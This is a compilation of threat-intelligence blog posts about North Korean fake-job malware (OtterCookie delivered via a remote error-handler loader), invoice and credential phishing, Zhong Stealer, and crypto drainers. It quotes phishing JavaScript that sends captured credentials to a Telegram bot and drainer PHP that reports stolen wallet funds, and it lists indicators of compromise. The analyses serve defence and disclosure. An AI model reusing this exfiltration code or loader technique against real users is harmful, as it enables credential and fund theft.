And that’s exactly what happened. There’s not just one José, there are two: one who acts as the frontman in the first interview, knows his way around with westerners, can speak a little in a second language (enough to pass a first screening); and a second, more technical one who plays ghost coder, solving exercises and challenges for the first José.

These muppets move, think, and act as a group. Separately, they each lack a critical skill to land the job, whether it’s language proficiency, technical ability, or even something as basic as common sense. Their weird behaviour isn’t a minor thing: remember, they come from a closeted country, cut off from most of the world. Culturally and socially, this creates a noticeable gap. One that is easy to spot once you learn how to use it to your advantage. Ask them what cartoons from the country they claim to be from they liked as a kid. Ask about pastimes, hobbies, or if they know a specific place in their town. You can even invent one and see if they fall for the trap.

We finally rejected the candidate, and he quickly deleted all his accounts: LinkedIn, WhatsApp, Telegram, all gone.

Happy ending?

Not quite.

Because what if I told you… there was actually a third José in this play?

Final Act: The Good, the Bad and the Ugly

There were three Josés all along. Let me explain.

These operatives almost always copy real people’s profiles across different platforms, mimicking every detail. When hunting back Wage Moles or Famous Chollimas, it’s trivial to stumble upon the real person they’re impersonating.

That’s why it’s crucial not to hunt them based on surface-level details like (copied) names or online portfolios, which are often stolen. Instead, focus on digital artefacts tied to the actor or under their control: phone numbers, email accounts, IP addresses, and so on. Even if disposable, those artefacts can still yield intel, while also helping you avoid disrupting the life of someone innocent whose identity has been cloned.

In this story, the Bad José tried to scam us with his forked tongue, but failed.

The Ugly José hid behind him, buried in the shadows, showing only his claws to type out code as broken as his partner-in-crime’s alibi.

And the Good José?

Well, we won’t disclose his details for obvious reasons, but yes, we found him. And he truly earns the title. His identity was stolen along with his entire résumé. He’s an engineer, doing well in life, and an environmental activist in his community, something these muppets could never dream of.

And that’s exactly where these actors belong: buried in the ground, hiding from the light.

IOCs, Extras & A Hunter’s Note

Given the nature and recency of the incident, and in order to protect the identity of the original José, only partial IOCs will be disclosed.

Email:oscarjj0924@gmail.com
Phone:+522212528618 #(WhatsApp, Telegram)

To compensate for this, and as thanks for reading this far, here’s a little extra.

The image of the Mole wearing a Mexican hat isn’t just satire, it’s actually a reference to a real profile picture used by the Mole on LinkedIn. A photo stolen from the original José, defaced with a Korean face clumsily pasted on top.

These campaigns are on the rise. Aside from the usual advice, I want to share a concern.

We have observed an interesting behaviour from Wage Mole operatives. They can copy and mimic every single detail of a LinkedIn account in little to no time. This suggests they may have developed a tool capable of using LinkedIn’s API or scraping its contents to automate that effort. We still lack full visibility and evidence on this matter, but it is something we are actively investigating.

Now the usual.

Stay safe.

Ask candidates to show IDs on your interviews (any proctored exam does it, anyway).

Don’t get rekt.

And do not hesitate to stomp on those muddy moles.

Do not let them overrun the garden you worked so hard to make bloom.

The Quetzal Team is proud to announce two new articles featured in PagedOut! eZine.

Spiders

Before joining Bitso and the Quetzal Team, José had the chance to confront the infamous Scattered Spider group — an epic task that left him with a few valuable lessons. He used those insights to profile the group and share his findings in this article, titled “Arachnophobia: How Scattered Spider Hunts.”

What could have been a horror story turned into an excellent technical profile of one of the most vicious threats out there.

Chollimas

Mauro shared “PhishedIn: Kim Jong Un Has Invited You to Connect”, based on the DragonJAR 2024 and Hacker Halted 2024 talk of the same name, co-presented with Ulises.

Expanded with the latest gossip threat intelligence, new indicators and activity, the article explains in simple terms how dedicated state-sponsored industrial spies are targeting the crypto and fintech sectors with all kinds of scams — fake job interviews, one-shot gigs, fake VCs, business calls, and more.

Both articles are available in Issue #6 (pages 67 & 76) — free to read.

Enjoy!

February came and went once again, this time without a peep from our dear friends behind the Great Firewall, nor from those under the menacing guise of the Great Leader. Not that I missed them, but something felt… off.

Had they forgotten about us? Are we no longer that important of a target? Did they simply decide to move on and forgive us every time we mocked them publicly—when their ACME-branded malware blew up in their faces, giving us the chance to weaponize it into talks and articles at the best conferences and magazines in the world?

No, I don’t think they’re the type to turn the other cheek. They waited until April to fine-tune the stockade after planning something highly targeted. At us.

Well, at me.

The North Korean Job

It all started in the most vicious hunting ground for Threat Actors, when a muppet well-respected Lazarus agent approached me carelessly under the name "Wilton Santos", asking if I was open to working on a fix for its DApp.

I asked for further clarification, and the sad story rolled in: they were a team of seven developers, but all of them were on vacation (bad human resources planning there), and needed a trivial but urgent fix on its UI.

The DApp was “Gamba v2”, a gaming platform where users could join by connecting with their wallets (you might think this is the strike point, but that would be too obvious). The UI problem was that they wanted to dynamically display the user’s wallet in a specific profile button. This is pretty trivial, and many JS libraries can do it in two or three lines of code.

After successfully patching the issue, I just needed to send a video of the fix working, and I would be paid the astronomical amount of 500 USDT for a 3-line patch.

<sarcasm>

I can’t believe there are BSD kernel developers out there submitting patches for free…

</sarcasm>

I accepted, because I can smell a good old-fashioned APT campaign miles away.

And then, our friend “Wilton” shared a BitBucket repository.

Time to get the work done, I guess.

Trying to Catch an Otter

There’s an important context to add here. The Chollimas (North Korean state-sponsored actors) are running a campaign targeting engineers and executives in the fintech and crypto sectors.

They attempt to trick engineers with fake job interviews or postings, coaxing them into running infected coding challenges.

They also target executives by luring them into Zoom calls with fake VCs or business partners. Once in, the attackers feign not hearing the victim speaking and act angry about it. Then, one of them shares a fake Zoom fix or update to solve the issue. Over the fear of the deal going sour, the victim usually runs it and gets infected. This effort is being tracked as DevPopper or ContagiousInterview.

But this time, it’s different. As noted in the closure of the last section, this repository was created just a day ago, with no public mentions of it, the person who shared it with me, or the endpoints and infrastructure it attempts to reach.

Everything is brand new.

But there’s still something more sinister about it: the code is completely clean. There’s no malicious payload, fake packages, infected libraries, or dependencies.

In Gibson’s words: It’s clear as ethanol.

But then, after carefully reviewing the code, I found their entry point, and I must say, it is the most creative one I’ve seen in a long time. While the code itself isn’t malicious, there’s a specific bootstrap function that will always fail. However, it’s contained within a Try/Catch block—a special construct where the language will Try to do something and Catch the workflow if something goes wrong, preventing it from crashing, and doing something to remediate the error.

That Catch block, in this case, will invoke a function called errorHandler, which will receive an error code directly from an external API… and execute it.

You read it right: the error code comes from a distant server in Finland (not a Gibson reference), and it is then executed via a require statement.

This is our implant!

Now, we could just burn it in an intelligence pulse… or better yet, use what we know to strike back.

The server has two open ports: port 80, running the API on Node.js Express, and port 7777, identified as running RDP (Remote Desktop Protocol for Windows).

Reaching out to the API and triggering a fabricated error reveals an interesting internal output, where we can see that our friends are indeed using Windows… with the Administrator user.

Running internet-facing services as a privileged user—worse yet, as Administrator—is a bad idea and Wilton will find out about it pretty soon.

The other service running on port 7777 is Remote Desktop Protocol, which allows us to authenticate—if only we had the necessary credentials.

But that’s a story for another day. They don’t know we know, so let’s use that to our tactical advantage.

Using ANY.RUN’s sandbox, we spin up a disposable Ubuntu machine, install NodeJs, and run the code as if we were an unsuspecting victim trying to make a quick 500 USDT (remember we’re here for that reason after all?).

Running the code, of course, triggers the mandatory failure, which bumps into the Try/Catch block, which receives the error from the Finnish API.

But what does that error say? It’s an obfuscated JavaScript snippet.

This would be executed directly on our local machine while we’re distracted trying to submit a patch for a visual bug. Lazarus loves obfuscating JavaScript code with a popular online tool, but since they don’t know we know, we’ll use it against them.

At first glance, it looks like BeaverTail—one of Lazarus’ latest cyberweapons, commonly paired with InvisibleFerret—but on closer inspection, it turns out to be another animal we still didn’t have in our personal collection: OtterCookie.

This not-so-playful otter works as a Stealer-type malware, targeting browser password managers and extensions (specifically crypto wallets), and is also deployed in the ContagiousInterview campaign.

We tried catching the Otter, and we did. We have the infrastructure, the sample, the involved accounts, and their communication script.

It was time to contact our ‘employer’ to update them on the progress of the job.

Interview with the Chollima

I went back to LinkedIn and told my employer that I had two ways of implementing the patch and would like to have a short meeting to discuss them. He bought it and wanted me to run the sample during the call to see the results.

And so, I started recording my screen, waiting in silence for the wild Chollima to set foot in the trap—and it did, with an anime profile picture and under the name of “0xdori DFO”.

I expected to see a majestic winged horse stomping bravely over the scene, but instead, I ended up with a scared little pony fleeing.

But, I’ll let you judge that for yourself…

The pony pranced away in panic, without saying another word.

Being gentlemen, I thought we could at least exchange a proper farewell, but I was promptly blocked.

We claimed the game and called it a day.

But, my friends, the hunting season never ends…

Indicators of Compromise

IPv4:135.181.123.177
Domain:chainlink-api-v3.cloud
URL:http[:]//chainlink-api-v3[.]cloud/api/service/token/56e15ef3b5e5f169fc063f8d3e88288e
URL:http[:]//chainlink-api-v3[.]cloud/api/
URL:https[:]//bitbucket.org/0xhpenvynb/mvp_gamba/downloads/
SHA256:aa0d64c39680027d56a32ffd4ceb7870b05bdd497a3a7c902f23639cb3b43ba1
SHA256:071aff6941dc388516d8ca0215b757f9bee7584dea6c27c4c6993da192df1ab9
SHA256:486f305bdd09a3ef6636e92c6a9e01689b8fa977ed7ffb898453c43d47b5386d
SHA256:ec234419fc512baded05f7b29fefbf12f898a505f62c43d3481aed90fef33687
FileName:0xhpenvynb-mvp_gamba-6b10f2e9dd85.zip
SOLWallet:V2grJiwjs25iJYqumbHyKo5MTK7SFqZSdmoRaj8QWb9

Resources & References

• Original Intelligence Pulse on LevelBlue OTX

• OtterCookie source code (obfuscated)

• OtterCookie source code (deobfuscated)

• Fake project (loader) source code

Acknowledgements & Contributors

This work would not be possible without the contribution from dedicated Lazarus Agents who surrendered their cyber-weapons to the Quetzal Team. We honor them here:

❌ Edward from Labyrinth Chollima. Fell during the QRLog campaign, in which we discovered the QRLog malware.

❌ Nargis from Velvet Chollima. Fell during the DreamJob campaign, in which we captured the Docks malware.

❌ Artyom from Velvet Chollima. Fell during the ContagiousInterview campaign, in which -alongside another team- we discovered the ChaoticCapybara malware.

❌ Wilton from Famous Chollima. Fell during the ContagiousInterview campaign, in which we captured the OtterCookie malware.

Comment [F] to pay respects and don’t cry for them: they fell bravely against the best.

Ah, invoices. Those delightful pieces of paper (or pixels) that remind us business is booming until one day you receive an invoice that feels just a little…fishy. Today, we’re diving into the world of fake invoice phishing campaigns, where cybercriminals craft invoices so polished they could put your favorite accounting software to shame. But don’t worry , we’re here to help you spot the tricks, share a laugh (or two), and keep your company’s funds safely out of the clutches of these digital scoundrels.

The Anatomy of a Deceptively Legitimate Invoice

Picture this: You open your inbox, and there it is, a pristine invoice for services you vaguely remember discussing. It is adorned with logos, professional fonts, and even that convincing "due by" date. But wait... something's off. Fake invoice phishing campaigns operate on this very premise, preying on human tendencies to trust what appears professional. Instead of rendering an actual service, these bogus invoices are nothing more than digital traps designed to make your finance team sign away your hard earned cash.

Let’s take a closer look:

“Look at that subtle off-white coloring. The tasteful thickness of it. Oh my God, it even has a watermark QR Code”

The attackers have truly mastered the art of deception. They blend in seamlessly with everyday communications, exploiting our natural inclination to act on what seems routine. It is like receiving a birthday card from a "long lost relative" who suddenly demands payment for a surprise party, charming on paper but disastrous in practice, Lets see Paul Allen’s card the attached PDF:

Something wrong, Patrick? You’re sweating


Yes, A lot..Maybe?

In this case, our detection system in the background raised a red flag that made us pause and take a second look, yet with just a minuscule enough discrepancy to warrant deeper investigation. It was like being in the middle of an elite business card exchange and suddenly spotting one card that just didn’t measure up:

Why such a delicate, well crafted, allegedly expected and totally legitimate invoice come from a newly generated domain?

Launch the CAPTURE:

Using our “proprietary” CAPTURE system (Centralized Analysis for Phishing Tactics Uncovering Red hErrings), we intercepted an official invoice?!. And yes, the QR code was official too sourced directly from Pix.

You heard that right. So where's the catch? Well, just follow the money: the payment destination details were altered, rerouting funds to our dear friends. A deeper dive into the indicators of compromise revealed the following:

A centralized phishing operation based in Eastern Europe that is actively impersonating multiple trusted brands to distribute fraudulent invoices. One of their latest templates impersonates a well known Brazilian hosting company and uses Santander Bank accounts along with the Pix payment application to route payments through a legitimate QR code. If a cautious user attempts to investigate further, the fake website quickly redirects them to the legitimate site, reinforcing the illusion of authenticity. The domain itself appears to be DGA-generated a hallmark of automated, ever changing phishing campaigns.

This isn’t their first rodeo. The same campaign has previously posed as the Czech Postage Service (Česká pošta), Australia Post (Aus Post), UPS, various delivery tracking services, and even Netflix. Adding insult to injury, the servers behind these scams are operated by the Moldavian company ALEXHOST SRL. These servers have a history of distributing malware such as the Trojan Downloader Morila, which remains active in the wild today. What a plot twist huh?

But I look so impeccably professional!


Conclusion: Stay Sharp and Scrutinize Everything

In our ever evolving digital landscape, fake invoice phishing campaigns remind us that a polished exterior does not guarantee legitimacy. Just like that unforgettable business card scene , it’s essential to scrutinize every detail before handing over your hard earned money. Next time you receive an invoice that seems flawless, take a moment to review every element because a little vigilance goes a long way in keeping your finances safe.

Keep your eyes sharp, your skepticism high, and remember: in the world of phishing, every detail counts even if it means channeling your inner Patrick Bateman.

Happy (and secure) invoicing!

IOCs

8b7078d1598b4a61fb5caf9f676bfa5fa0b4e0807ad3bb3f27795c7fbbe9a4a9			ecdf0573ee874850cddec849079f1443a69fad9b7378ad6c530af65f65c3509a			91.208.184.248	
registrodewesite[.]shop
contato@registrodewesite[.]shop

References

• AlienVault OTX - Quetzal Team original intelligence pulse
  
  

2025 has just begun, and scammers aren’t taking any breaks. Earlier today, a new phishing campaign landed in our support ticketing inbox. At first glance, we assumed it was a continuation of the Zhong Stealer campaign—but this one was different.

“Account suspension notification”, read the ticket, sent by someone impersonating one of our admins. Despite the absurd claim—and the equally absurd method of delivering it—we immediately began investigating.

The Phisher Muppet

Our scammer used a website hosted on Google Appspot that posed as a login form.

A quick look at the URL revealed that we could manipulate it to modify the form and tailor it for other potential victims. Parsing arguments from an URL? That’s a muppet way to do things.

This behaviour is led by this small code snippet, which extracts the domain (everything after the “@” symbol) and displays it as the company the form supposedly belongs to:

var ind = my_ai. indexOf ("@");
var m_slic = my_ai. substr((ind + 1)) ;
var c = m_slic.substr(0, m_slic.index0f('.'));
var fnll = c. toLowerCase();
var fllu = c. toUpperCase();
var browser = GetBrowserandLanguage () [0];

Resorting to client-side code like JavaScript to reflect content on a phishing page? That sounds like a muppet move. This is a clear indicator of inexperience, so let’s take a closer look at the rest of the code—there’s a good chance we’ll uncover more clues.

var f = "bmV4dC5waHA=";
$( '#sub_btn'). click(function (event) {
  $( '#errror').hide();
  [...]

“next.php” encoded in Base64. Let’s see what’s next:

var message = "-+ General Webmail ReZulT +=\n";
message += "Email: " + ai + "\n"; 
message += "Password: " + pr + "\n";
message += "Browser : " + GetBrowserandLanguage () [0] + "\n";
message += "Language: " + GetBrowserandLanguage () [1] + "\n"; 
message += "MX Record: " + await getMXRecord (domain) + "\n"; 
message += "IP Address : " + ip + "\n"; message += "Date: " + date + "\n";
message += "—-+ General Webmail ReZulT +---\n";
var token = "73[REDACTED]rI";
var chatId = "1[REDACTED]6";
dataType: 'JSON', rl: 'https://api.telegram.org/bot${token}/sendMessage,
type: 'POST',
data: {
[...]

So, our Threat Stuntman (he clearly isn’t quite an actor) left a plaintext Telegram Bot Token and a Telegram Chat ID in the code.

Base64 encoded strings, client-side tokens, “ReZulT” l33t speaking, URL based constructions…

Let’s see what happens in the backstage.

Muppet Pest Control (A subsidiary of Threat Punchers INC)

At the backstage, the Muppet will fetch our IP address information from ipinfo.io, classic move.

Then, will try to resolve the MX DNS record using Google’s services.

Next, all gathered information including credentials are sent via Telegram Message, once again exposing the Bot Token and the Chat ID.

Now if we were bad people (and we are not) we could have just grabbed the Bot Token and start spamming content on its behalf. By modifying the text parameter, we can literally send anything under the Bot’s name.

Now, if we were really bad people (again, we are not), we could just change the chat_id parameter also, and start spamming anyone with any content under the Bot’s name.

Let’s try to find out this Bot’s handler and who is it relying information to. We can do so with Telegram’s API.

And there it is—our Muppet and the puppeteer behind it.

Now comes our favourite part: the flamethrower. Let’s burn down their accounts, starting with reports to their providers, followed by our Brand Protection solutions to speed up the process and keep the issue under control.

Another day, another burnt phishing infra. Now we can freely enjoy the rest of our Friday.

Thanks for reading, and don’t go on a fishing trip without your muppet repellent.

IOCs

URL:https://firebasestorage.googleapis[.]com/v0/b/aloneatprom-
7fde1.appspot.com/o/gb%2Funiversal.html?alt=media&token=93f4ac80-4eae-4cd1-8b68-294631c8c821#ayuda@bitso.com)
TelegramBot:@Slimkudibot

The holiday season is also open season for malware developers and operators. With teams at various companies working with reduced personnel—some resting at home, others eagerly awaiting their well-deserved break—it becomes an unmissable opportunity for the ecosystem’s bad actors.

While some see this as a problem, we see it as a chance to unwrap early presents and play with these rabid toys one last time before the year-end dinner. Here’s the story of how some bad actors tried to steal our Christmas, but instead became our Secret Santa.

The client who cried wolf

December 2024. It all started with a ticket—or rather, a flood of them.

Each one came from newly created, empty accounts, written in broken language, and asking for help in our support chat in Chinese.

And it gets weirder (social engineering at its finest).

The pattern was the same: open a case and immediately attach a ZIP file with Chinese characters in its name, supposedly containing screenshots and additional details.

When analysed, these files brought us an unexpected Xmas surprise: free malware! For some, this might be the digital equivalent of coal, but for us, it’s a sign that we’re firmly off the cyber-naughty list.

Let’s take a look at our gift.

Not your usual Chinese tale

We’ve all heard of Chinese tales once in our lifetime, but this one is different and falls apart as a scam pretty easily:

• As stated before, the ZIP file names contain Simplified Chinese characters like “Android 自由截图_20241220” (Android Free Screenshot_20241220) or “图片_20241224 (2)” (Image_20241224 (2)).

• Inside of them, executable files can be found, again, with Simplified and Traditional Chinese characters in their names like “图片_20241224.exe” (Image_20241224.exe - Simplified Chinese), “圖片2024122288jpg.exe” (Image2024122288jpg.exe - Traditional Chinese), or “图片_20241220.exe” (Image_20241220.exe - Simplified Chinese).

• These executables communicate with servers hosted on China’s Alibaba Cloud.

• And also for the little simple fact that we do not serve clients in the Chinese market…

So what are their intentions? Let’s find out, scalpel in hand.

恶意软件

We started with the basics: was anyone else targeted by this campaign? Surprisingly, the malware components had very few detections initially, as shown below.

Over time, different strains of the malware (remember, we received three of them) began receiving more detections from various antivirus vendors.

However, all detections were labelled generically, without assigning a proper name.

Most of these names are heuristically generated, often appearing as placeholders like “AIDetectMalware,” “Malware.AI,” “ML.Attribute.HighConfidence,” “malicious_confidence_90%,” “Static AI,” or simply “Generic.”

These labels reveal little about the malware’s actual characteristics or behaviour. So, we took a closer look at the sample to give it a proper identity. We named it “中窃者” (Zhong Stealer). The word zhong means “central,” inspired by the original username from which we received the fake ticket.

Now, let’s dig deeper into its mechanics and see exactly how it works.

Zhong Stealer (中窃者)

The first thing our new friend will do in order to steal christmas is to download a new binary called “down.exe” from chinese servers hosted on Alibaba Cloud, along with a DLL library, a LOG file and a TXT file with mirrors just in case something goes bad acquiring the components. This process will then create a BAT file on the users temporary folder which will prepare the environment and communicate with a Hong Kong based server before continuing.

Then, the Christmas heist takes place. Zhong will start a recon routine on the system reading security settings, hostname, supported language (possibly to avoid attacking on specific regions), and then will add persistence via a Registry Key.

Then, it will start looking for credentials and sensitive data stored on browsers like Edge and Brave.

The rest is a well-known story: our Secret Santa turns into a Krampus.

To avoid falling into the same trap, remember: even on Christmas Eve, not every package is a gift. Let suspicious packages be handled by your security team—and don’t open them yourself.

Stay safe!

IOCs

FileHash-MD5:778b6521dd2b07d7db0eaeaab9a2f86b
FileHash-SHA1:ce120e922ed4156dbd07de8335c5a632974ec527
FileHash-SHA256:02244934046333f45bc22abe6185e6ddda033342836062afb681a583aa7d827f
FileHash-SHA256:1abffe97aafe9916b366da57458a78338598cab9742c2d9e03e4ad0ba11f29bf
FileHash-SHA256:4eaebd93e23be3427d4c1349d64bef4b5fc455c93aebb9b5b752981e9266488e
FileHash-SHA256:dd44dabff5361aa9b845dd891ad483162d4f28913344c93e5d59f648a186098
FileHash-SHA256:e46779869c6797b294cb097f47027a5c52466fd11112b6ccd52c569578d4b8cd
FileHash-SHA256:5f422be165e4b6557f45719914f724a4fe1840fa792ecc739861bfdb45c1550
URL:hxxps://kkuu.oss-cn-hongkong.aliyuncs[.]com/ss/TASLogin.log
URL:hxxps://kkuu.oss-cn-hongkong.aliyuncs[.]com/ss/TASLoginBase.dll
URL:hxxps://kkuu.oss-cn-hongkong.aliyuncs[.]com/ss/down.exe
URL:hxxps://kkuu.oss-cn-hongkong.aliyuncs[.]com/ss/uu.txt
email:zhongmaziil992@outlook.com
hostname:kkuu.oss-cn-hongkong.aliyuncs[.]com
IPv4:156.245.23.188
IPv4:47.79.64.228

References

• LevelBlue Threat Exchange - Original Intelligence Pulse (December 2024)

We’ve written a lot about drainers on this blog, showing how these contracts and implants are equally smart and malicious. They employ large criminal ecosystems and, at times, posing as schemes so ridiculous they're almost laughable, yet they trick users into losing their funds with a single click.

But today, we’re going to get our hands dirty—not with oily, flammable substances to burn it all down, as you’re used to when reading my articles—but in a different way.

We’ve captured four drainer samples with complete frontend and backend source code, and we’re about to run a series of autopsies on them to understand how they’re trying to deceive victims, what goes on backstage, and the threat actors' thinking behind them.

Enough talk. Let me welcome you to Dr Ainer’s absolutely legitimate clinic. Grab a pair of gloves and that Netter book—things are about to get messy.

🧟‍♂️ Dr Ainer, to the autopsy theatre immediately

Our first patient is ‘ETH Polygon BNB’, which seems to be missing a few pieces but somehow still manages to function (aren't we all just like that at this time of year?).

With a simple HTML template and a PHP backend, our first task as quacks reputable smart contract field surgeons doesn't seem too challenging.

Some time ago, the LENS protocol allowed users to claim and mint handles, but in most cases, users had to be previously whitelisted or attend specific conferences or events. Naturally, this generated high demand. Our first patient seems to prey on that desire for LENS handles—and it shows.

This HTML template restricts itself to mimicking the LENS claim site and calling the following JS libraries

• ethers.js (official)

• web3.js (official)

• web3-connect.js (local version)

• ethers.js (local version)

• web3-provider.js (local version)

Let’s take a look under the hood. Scalpel, please.

<?PHP

// =====================================================================
// ========================= НАСТРОЙКИ СКРИПТА =========================
// =====================================================================

define('BOT_TOKEN', '53427[REDACTED]gqTT10'); // Токен бота Telegram из @BotFather
define('CHAT_ID', '-[REDACTED]'); // ID вашего чата или канала, куда будут идти уведомления с сайта
// =====================================================================
// ============ ВНОСИТЬ ИЗМЕНЕНИЯ В КОД НИЖЕ НЕ БЕЗОПАСНО ==============
// =====================================================================

Even if you can’t read Russian (or PHP at all), you might get a sense of what’s happening here. The attacker is using a Telegram bot as a communication channel. The comments actually translate as follows:

🇷🇺 НАСТРОЙКИ СКРИПТА

🇬🇧 Script configuration

🇷🇺 Токен бота Telegram из BotFather

🇬🇧 BotFather Telegram bot token

BotFather is the bot you talk to in Telegram in order to create or manage bots

🇷🇺 ID вашего чата или канала, куда будут идти уведомления с сайта

🇬🇧 Your channel ID where notifications from the site are sent

🇷🇺 ВНОСИТЬ ИЗМЕНЕНИЯ В КОД НИЖЕ НЕ БЕЗОПАСНО

🇬🇧 Not safe to make changes from now on

The PHP backend includes a function that checks for specific IP ranges from CloudFlare to prevent these addresses from interacting with the website.

if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
  $cf_ip_ranges = [   '204.93.240.0/24','204.93.177.0/24','199.27.128.0/21','173.245.48.0/20','103.21.244.0/22','103.22.200.0/22','103.31.4.0/22','141.101.64.0/18',
'108.162.192.0/18','190.93.240.0/20','188.114.96.0/20','197.234.240.0/22','198.41.128.0/17','162.158.0.0/15'
  ];
  foreach ($cf_ip_ranges as $range) {
    if (ip_in_range($_SERVER['REMOTE_ADDR'], $range)) {
      $_SERVER['REMOTE_ADDR'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
      break;
    }
  }
}

The ip-api API is also queried to determine the visitor’s country based on their IP address.

function getCountryFromIP($address) {
  $ch = curl_init("http://ip-api.com/json/$address");
  [...]
  if (json_last_error() === JSON_ERROR_NONE) {
    return $response['status'] == 'success' ? $response['countryCode'] : 'UNK';
  } else {
    return 'UNK';
  }
}

At this point, malicious interactions with the drainer have already taken place via the JS libraries, which aren’t malicious per se—they’re simply doing what they’re designed to do: interacting with smart contracts. Finally, the backend checks the $_GET['action'] variable to determine the next step and communicate with the operator.

if (isset($_GET['action']) && $_GET['action'] == 'retrive') {
  $approves = json_decode(file_get_contents('approve.json'), true);
  file_put_contents('approve.json', '[]');
  exit(json_encode($approves));
} elseif (isset($_GET['action']) && $_GET['action'] == 'transfer_token') {
  $chain_name = $_GET['chain_id'] == 1 ? 'Ethereum' : 
  ($_GET['chain_id'] == 56 ? 'BNB Smart Chain' : 'Polygon');
  sendTelegramMessage("
  <b>💎 Отправлен токен</b>\n\n
  <b>⛓ Сеть:</b> <code>$chain_name</code>\n
  <b>💎 Токен:</b> <code>$_GET[token]</code>\n
  <b>💰 Сумма:</b> <code>$_GET[amount]$</code>");
}

if ($data['action'] == 'visit') {  
} elseif ($data['action'] == 'connect') {
  sendTelegramMessage("
  <b>🦊 Подключен кошелек</b>\n\n
  <b>🌐 IP адрес:</b> $_SERVER[REMOTE_ADDR]\n
  <b>🏴‍☠️ Страна:</b> $visitor_country\n\n
  <b>👛 Адрес:</b> https://debank.com/profile/$data[address]");
} elseif ($data['action'] == 'transfer_native') {
  $chain_name = convertCIDtoCName($data['chain_id']);
  sendTelegramMessage("
  <b>💸 Отправлена монета</b>\n\n
  <b>🌐 IP адрес:</b> $_SERVER[REMOTE_ADDR]\n
  <b>🏴‍☠️ Страна:</b> $visitor_country\n\n
  <b>⛓ Сеть:</b> <code>$chain_name</code>\n
  <b>💰 Сумма:</b> <code>$data[amount]$</code>");
} elseif ($data['action'] == 'approve_token') {
  $approves = json_decode(file_get_contents('approve.json'), true);
  array_push($approves, $data);
  file_put_contents('approve.json', json_encode($approves));
  if ($data['notification'] == true) {
    $chain_name = convertCIDtoCName($data['chain_id']);
    sendTelegramMessage("
   <b>✅ Подтверждение токена</b>\n\n
   <b>🌐 IP адрес:</b> $_SERVER[REMOTE_ADDR]\n
   <b>🏴‍☠️ Страна:</b> $visitor_country\n\n
   <b>⛓ Сеть:</b> <code>$chain_name</code>\n
   <b>💎 Токен:</b> <code>$data[token]</code>\n
   <b>💰 Сумма:</b> <code>$data[amount]$</code>");
  }
}

The action variable supports different values:

• retrive (sic): Creates the temporary file approve.json.

• transfer_token: Determines the blockchain to use (Ethereum, BNB, Polygon), then sends the following message to the operator:

  💎 Token sent

  ⛓ Network: [Chain]

  💎 Token: [Token]

  💰 Amount: [Amount]

• visit: Does nothing.

• connect: Sends the following message to the operator, including a link to DeBank (a legit platform):

  🦊 Wallet connected

  🌐 IP Address: [IP address]

  🏴‍☠️ Country: [Country or “UNK”]

  👛 Address: https://debank.com/profile/[Address]

• transfer_native: Determines the blockchain to use and sends the following message to the operator:

  💸 Coin sent

  🌐 IP Address: [IP address]

  🏴‍☠️ Country: [Country or “UNK”]

  ⛓ Network: [Chain]

  💰 Amount: [Amount]

• approve_token: Reads the stored information in the approve.json file, determines the blockchain to use and sends the following message to the operator:

  ✅ Token approval

  🌐 IP Address: [IP address]

  🏴‍☠️ Country: [Country or “UNK”]

  ⛓ Network: [Chain]

  💎 Token: [Token]

  💰 Amount: [Amount]

And that’s it. The prey falls into the trap, automatically losing all its funds to the operator, who receives a colourful message on Telegram announcing the day’s earnings.

That one was easy. We’re still far from the great medical minds like Dr Herbert West, Dr Phibes or Dr Jonathan Crane, but we’ll get there eventually. And definitely not by talking—so, with no synthetic tissue left to analyse, we’re free to move on to the next stretcher.

💉 Dr Ainer, subject POA (PWND on Arrival)

The tag on its toe reads 'invisiblefriends-main', and at first glance, it is (or was) a fairly well-crafted phishing website built with React.

The template referenced legitimate social profiles and accounts, along with the real INVISIBLE FRIENDS smart contract, and even used Amazon S3 buckets to host part of its static content—a rather interesting move.

While browsing through their AWS infrastructure, I noticed something that rang a bell, though I couldn’t quite place it: a reference to Garbage Friends. I was convinced that I’d crossed paths with that Sesame Street-like character before, but couldn’t remember when.

The index file has a PHP extension but contains no PHP code at all; in fact, it’s just plain HTML relying on JavaScript to do the heavy lifting. Everything happens on the frontend, so there’s no quirky backend to dissect this time. Let’s focus on the JS libraries instead:

• web3.min.js

  • Provides tools to interact with the Ethereum blockchain from the frontend. It connects to the user’s wallet (like MetaMask) and facilitates calls to smart contracts.

• ethereumjs-tx-1.3.3.min.js

  • Allows for the creation and signing of Ethereum transactions directly in the browser. It enables the drainer to generate transaction data and send it to MetaMask directly.

• SignBlock.js

  • Manages MetaMask connection and handles the “Mint” button functionality. When the user clicks the button, it triggers MetaMask’s prompt for signing a transaction, allowing the drainer to initiate blockchain actions.

• WalletButton.js

  • Controls the connection status of the user’s wallet and displays the wallet address in the interface once connected. It enables seamless interaction with MetaMask, readying the user for signing transactions when needed.

Their functions are straightforward and easy to understand: requesting victims' ETH accounts, tracking any changes, and presenting them with transactions to sign.

ethereum.request({ method: "eth_accounts" })
.then((a) => setAddr(a[0]));

this.provider.sendTransaction(r)

ethereum.on("accountsChanged", (a) => setAddr(a.length ? a[0] : ""));
ethereum.on("connect", (a) => setAddr(a.length ? a[0] : ""));

That’s not all. I saved an obfuscated JavaScript file called utils.js for last, suspecting it would cause trouble. Due to its size (over 5MB), most deobfuscators failed to process it. When executed, it simply returns a unique ID string.

After many blackbox tests ran on different browsers and setups we couldn’t trigger it to behave in any other way, but one of our engineers jumped in as he recognized the code to be “jsfuck”, an esoteric language based on JavaScript.

After finding a suitable jsfuck deobfuscator we were pretty safe to asume we just witnessed the most puzzling, nightmarish and ill-intentioned ID generator.

And we loved it.

A complex frontend, no backend, and JavaScript hexes to keep this nightmare fuel burning. I thought we'd seen it all… but no, wait a minute.

Remember Garby? That trash can character from Garbage Friends? Well, out of the blue, I remembered how we met. I decided to check my old Tweets—and there it was. Back in 2022, a threat actor hacked into Argentina’s Security Minister Sabina Frederic’s official Twitter account to advertise their drainer, disguised as a Garbage Friends airdrop. They were using the exact same image they are now, though rendered in a 3D style.

At that time, Twitter verification was reserved for selected users, not available as a paid feature like it is today—making verified accounts especially valuable.

So, nice to see you again, Garby—though it’s unfortunate we always meet under cybercriminal circumstances. I’d love to stay and chat, but another undead crypto malware awaits on the operating table. If I may.

🧬 Dr Ainer, code sequence anomaly detected

Our next patient was 'ETH SMASH', and setting it up was a challenge in itself: missing dependencies led to missing functions, which led to even more missing pieces and features.

But with practices closer to cyber-necromancy than medicine somehow, we stitched it back together and jolted it back to life…

Come on, don’t 404 on me now!

